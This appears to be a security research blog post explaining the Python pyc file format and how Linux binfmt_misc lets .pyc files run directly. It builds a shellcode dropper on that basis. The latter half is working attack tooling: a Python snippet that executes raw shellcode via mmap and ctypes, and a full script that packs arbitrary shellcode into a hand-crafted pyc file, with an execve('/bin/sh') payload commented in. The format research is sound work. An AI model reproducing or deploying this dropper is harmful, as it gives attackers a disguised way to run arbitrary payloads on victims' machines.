Python pyc files are a binary format that is used to speed up the process of
interpreting imported files. They contain a small header, metadata about the code
object, and the bytecode itself.
There's a lot of resources for Python2.7, but since Python 2.x has been deprecated,
there aren't many resources for Python3, specifically Python3.7+. Much of the main
difference between Python versions is the addition of newer opcodes which aren't
supported in older versions. There are also file format extensions, changes, and
newer features.
[: Quick Rundown on the cpython VM :]
CPython is the name of the VM that runs Python. When you run a python program, the
interpreter will take your code, and turn it into a code object that is used to
tell the Python VM what to do. I won't get into all the details because there are
some really good resources that deep dive into how everything works.
- https://tenthousandmeters.com/blog/python-behind-the-scenes-1-how-the-cpython-vm-works/
- https://nowave.it/python-bytecode-analysis-1.html
- https://github.com/rocky/python-decompile3
The main thing we care about is that .pyc files are these code objects, which can
be interpreted by python as standalone files.
Test yourself!
$ cat hehe.py
print("hehe")
$ cat ok.py
import hehe
print("ok")
$ python3 ok.py
hehe
ok
In the same directory you ran this script, a directory called __pycache__ has been
created. This contains a file called hehe.cpython-39.pyc. I am using python3.9
here, so the file name reflects that.
You can then run this program directly using Python3.
$ python3 __pycache__/hehe.cpython-39.pyc
hehe
But did you know that you can run this without calling python3 from the cli?
$ chmod +x __pycache__/hehe.cpython-39.pyc
$ __pycache__/hehe.cpython-39.pyc
hehe
[: Binary Format Handlers :]
Linux has a way of registering binary format handlers for different programs.
Typically you use ELF binaries or bash scripts to run programs on Linux, but there
are cases where a binary file format might enjoy some support without having to
call it's interpreter directly. In the case of scripts, you can use a shebang (#!)
with the path to the interpreter to generally tell your shell what to do with it.
Binary formats don't usually have room for something like this, so something else
must tell the kernel what to do. The way this is handled is through binfmt_misc.
This is a part of the kernel which allows users to register binary format handlers
for arbitrary formats.
- https://en.wikipedia.org/wiki/Binfmt_misc
- https://elixir.bootlin.com/linux/v5.19/source/fs/binfmt_misc.c
You can see what binfmt's are supported using the binfmt-support package.
$ sudo apt install binfmt-support
$ /sbin/update-binfmts --display
jar (enabled):
package = openjdk-11
type = magic
offset = 0
magic = PK\x03\x04
mask =
interpreter = /usr/bin/jexec
detector =
python3.9 (enabled):
package = python3.9
type = magic
offset = 0
magic = \x61\x0d\x0d\x0a
mask =
interpreter = /usr/bin/python3.9
detector =
We can see that Python3.9 is registered in with magic value "\x61\x0d\x0d\x0a".
This can be confirmed using xxd on the pyc file. The first four bytes match the
registered magic value.
$ xxd __pycache__/hehe.cpython-39.pyc | head -n1
00000000: 610d 0d0a 0000 0000 b7d7 f262 0f00 0000 a..........b....
This is registered by default when python3 is installed in your distribution.
For more info on how to register binary formats, check out the kernel docs.
https://docs.kernel.org/admin-guide/binfmt-misc.html
You can also do some weirdness to do something like automagically run assembly
as a script. See here: https://twitter.com/iximeow/status/1487578872363192322
[: Making a shellcode dropper :]
Since we have the ability to run pyc files that match the version of the python
interpreter on the machine, we can use this to make a cross platform shellcode
dropper using pyc. Since the bytecode will be generally the same in python3.7+,
all that needs to change is the shellcode injected into a pyc file.
Here's an example script to execute shellcode from python
import ctypes
import mmap
s = b"\xb0\x3c\x66\xbf\x75\x00\x0f\x05"
m = mmap.mmap(-1, 0x1000, 0x22, 0x7,)
m.write(s)
a = int.from_bytes(ctypes.string_at(id(m) + 16, 8), "little")
t = ctypes.CFUNCTYPE(ctypes.c_void_p)
t(a)()
Now to turn this into a pyc file, you can just import this file from another
script, or you can use the py_compile module.
To make this dynamic, we can turn this .pyc file into a template for a script to
generate our own pyc files. Without going into all the gory details of the pyc
file format (which changes frequently -_-), we can leverage some tools such as
decompyle3 to tell us what the code looks like. This is all in the comments of
the following script, but with some of the other structures listed as well.
This should provide a good amount to play with if you're interested in the file
structure of pyc files. If you have any questions feel free to hit me up on
twitter, @netspooky.
POC Video for multi-stage dropper here: https://www.tiktok.com/t/ZTRU3mLt2/?k=1
---BEGIN CODE---
import struct
import sys
# Python3.7+ shellcode dropper
# - This is written with python3.7 + opcodes
# - Because it's a file format for the python3 vm, you can swap the architecture
# of the shellcode without needing to change the dropped pyc file
# Usage:
# $ printf "\xb0\x3c\x66\xbf\x75\x00\x0f\x05" | python3 drop.py
outfile = "yup.bin"
#shc = b"\x31\xC0\x48\xBB\xD1\x9D\x96\x91\xD0\x8C\x97\xFF\x48\xF7\xDB\x53\x54\x5F\x99\x52\x57\x54\x5E\xB0\x3B\x0F\x05" # execve("/bin/sh")
#shc = b"\xb0\x3c\x66\xbf\x75\x00\x0f\x05" # Return 0x75
shc = sys.stdin.buffer.read() # Read from terminal input
def writeBin(b):
f = open(outfile,'wb')
f.write(b)
f.close()
shc_len = len(shc)
shc_len_b = struct.pack("I",shc_len)
module_len = 0x00 # This calculation doesn't seem to even matter?
total_len = struct.pack("I",module_len + shc_len)
pyc_bin = b""
pyc_bin += b"\x61\x0d" # Version magic - here using python 3.9 - https://github.com/google/pytype/blob/main/pytype/pyc/magic.py
pyc_bin += b"\x0d\x0a" # Magic continued
pyc_bin += b"\x00\x00\x00\x00" # ??
pyc_bin += b"\x62\x6f\x6f\x21" # Timestamp
pyc_bin += total_len # Length, module_len + shc_len. Little endian
pyc_bin += b"\xe3\x00"
pyc_bin += b"\x00\x00\x00\x00" # co_argcount
pyc_bin += b"\x00\x00\x00\x00" # co_kwonlyargcount
pyc_bin += b"\x00\x00\x00\x00" # co_nlocals
pyc_bin += b"\x00\x00\x00\x06" # co_stacksize
pyc_bin += b"\x00\x00\x00\x40" # co_flags
pyc_bin += b"\x00\x00\x00\x73" # ??
pyc_bin += b"\x64\x00\x00\x00" # Bytecode length
######################## Disassembly ########################################### import ctypes
pyc_bin += b"\x64\x00" # 1 0 LOAD_CONST 0 (0)
pyc_bin += b"\x64\x01" # 2 LOAD_CONST 1 (None)
pyc_bin += b"\x6c\x00" # 4 IMPORT_NAME 0 (ctypes)
pyc_bin += b"\x5a\x00" # 6 STORE_NAME 0 (ctypes)
################################################################################ import mmap
pyc_bin += b"\x64\x00" # 2 8 LOAD_CONST 0 (0)
pyc_bin += b"\x64\x01" # 10 LOAD_CONST 1 (None)
pyc_bin += b"\x6c\x01" # 12 IMPORT_NAME 1 (mmap)
pyc_bin += b"\x5a\x01" # 14 STORE_NAME 1 (mmap)
################################################################################ s = b"our shellcode"
pyc_bin += b"\x64\x02" # 4 16 LOAD_CONST 2 (b'shellcode')
pyc_bin += b"\x5a\x02" # 18 STORE_NAME 2 (s)
################################################################################ m = mmap.mmap(-1, 0x1000, 0x22, 0x7,)
pyc_bin += b"\x65\x01" # 5 20 LOAD_NAME 1 (mmap)
pyc_bin += b"\xa0\x01" # 22 LOAD_METHOD 1 (mmap)
pyc_bin += b"\x64\x03" # 24 LOAD_CONST 3 (-1)
pyc_bin += b"\x64\x04" # 26 LOAD_CONST 4 (4096)
pyc_bin += b"\x64\x05" # 28 LOAD_CONST 5 (34)
pyc_bin += b"\x64\x06" # 30 LOAD_CONST 6 (7)
pyc_bin += b"\xa1\x04" # 32 CALL_METHOD 4
pyc_bin += b"\x5a\x03" # 34 STORE_NAME 3 (m)
################################################################################ m.write(s)
pyc_bin += b"\x65\x03" # 6 36 LOAD_NAME 3 (m)
pyc_bin += b"\xa0\x04" # 38 LOAD_METHOD 4 (write)
pyc_bin += b"\x65\x02" # 40 LOAD_NAME 2 (s)
pyc_bin += b"\xa1\x01" # 42 CALL_METHOD 1
pyc_bin += b"\x01\x00" # 44 POP_TOP
################################################################################ a = int.from_bytes(ctypes.string_at(id(m)+16,8),"little")
pyc_bin += b"\x65\x05" # 7 46 LOAD_NAME 5 (int)
pyc_bin += b"\xa0\x06" # 48 LOAD_METHOD 6 (from_bytes)
pyc_bin += b"\x65\x00" # 50 LOAD_NAME 0 (ctypes)
pyc_bin += b"\xa0\x07" # 52 LOAD_METHOD 7 (string_at)
pyc_bin += b"\x65\x08" # 54 LOAD_NAME 8 (id)
pyc_bin += b"\x65\x03" # 56 LOAD_NAME 3 (m)
pyc_bin += b"\x83\x01" # 58 CALL_FUNCTION 1
pyc_bin += b"\x64\x07" # 60 LOAD_CONST 7 (16)
pyc_bin += b"\x17\x00" # 62 BINARY_ADD
pyc_bin += b"\x64\x08" # 64 LOAD_CONST 8 (8)
pyc_bin += b"\xa1\x02" # 66 CALL_METHOD 2
pyc_bin += b"\x64\x09" # 68 LOAD_CONST 9 ('little')
pyc_bin += b"\xa1\x02" # 70 CALL_METHOD 2
pyc_bin += b"\x5a\x09" # 72 STORE_NAME 9 (a)
################################################################################ t = ctypes.CFUNCTYPE(ctypes.c_void_p)
pyc_bin += b"\x65\x00" # 8 74 LOAD_NAME 0 (ctypes)
pyc_bin += b"\xa0\x0a" # 76 LOAD_METHOD 10 (CFUNCTYPE)
pyc_bin += b"\x65\x00" # 78 LOAD_NAME 0 (ctypes)
pyc_bin += b"\x6a\x0b" # 80 LOAD_ATTR 11 (c_void_p)
pyc_bin += b"\xa1\x01" # 82 CALL_METHOD 1
pyc_bin += b"\x5a\x0c" # 84 STORE_NAME 12 (t)
################################################################################ t(a)()
pyc_bin += b"\x65\x0c" # 9 86 LOAD_NAME 12 (t)
pyc_bin += b"\x65\x09" # 88 LOAD_NAME 9 (a)
pyc_bin += b"\x83\x01" # 90 CALL_FUNCTION 1
pyc_bin += b"\x83\x00" # 92 CALL_FUNCTION 0
pyc_bin += b"\x01\x00" # 94 POP_TOP
pyc_bin += b"\x64\x01" # 96 LOAD_CONST 1 (None)
pyc_bin += b"\x53\x00" # 98 RETURN_VALUE
################################################################################
pyc_bin += b"\x29\x0a" # co_consts - List of the constants in this program
pyc_bin += b"\xe9\x00\x00\x00\x00" # 0
pyc_bin += b"\x4e\x73" # None
pyc_bin += shc_len_b # Shellcode length, little endian.
pyc_bin += shc # Shellcode
pyc_bin += b"\xe9\xff\xff\xff\xff" # -1
pyc_bin += b"\x69\x00\x10\x00\x00" # 4096
pyc_bin += b"\xe9\x22\x00\x00\x00" # 34
pyc_bin += b"\xe9\x07\x00\x00\x00" # 7
pyc_bin += b"\xe9\x10\x00\x00\x00" # 16
pyc_bin += b"\xe9\x08\x00\x00\x00" # 8
pyc_bin += b"\xda\x06" + b"little"
pyc_bin += b"\x29\x0d" # co_names - List of defined names, like a strtab
pyc_bin += b"\x5a\x06" + b"ctypes"
pyc_bin += b"\x5a\x04" + b"mmap"
pyc_bin += b"\xda\x01" + b"s" # The name of the shellcode variable
pyc_bin += b"\xda\x01" + b"m" # Memory area
pyc_bin += b"\xda\x05" + b"write"
pyc_bin += b"\xda\x03" + b"int"
pyc_bin += b"\xda\x0a" + b"from_bytes"
pyc_bin += b"\x5a\x09" + b"string_at"
pyc_bin += b"\xda\x02" + b"id"
pyc_bin += b"\xda\x01" + b"a" # Converted shellcode buffer
pyc_bin += b"\x5a\x09" + b"CFUNCTYPE"
pyc_bin += b"\x5a\x08" + b"c_void_p"
pyc_bin += b"\xda\x01" + b"t"
pyc_bin += b"\xa9\x00" # co_varnames
pyc_bin += b"\x72\x10\x00\x00\x00" # co_freevars
pyc_bin += b"\x72\x10\x00\x00\x00" # co_cellvars
pyc_bin += b"\xfa\x0b" + b"spookin'usa" # co_cell2arg - file name
pyc_bin += b"\xda\x08" + b"<module>" # co_name - name
pyc_bin += b"\x01\x00\x00\x00" # first line number
pyc_bin += b"\x73\x0e\x00\x00\x00" # co_lnotab tag + size (0x0e)
pyc_bin += b"\x08\x01\x08\x02\x04\x01\x10\x01\x0a\x01\x1c\x01\x0c\x01" # co_lnotab
print(f"Dropping {outfile} - Shellcode Size: {shc_len}")
writeBin(pyc_bin)
---END CODE---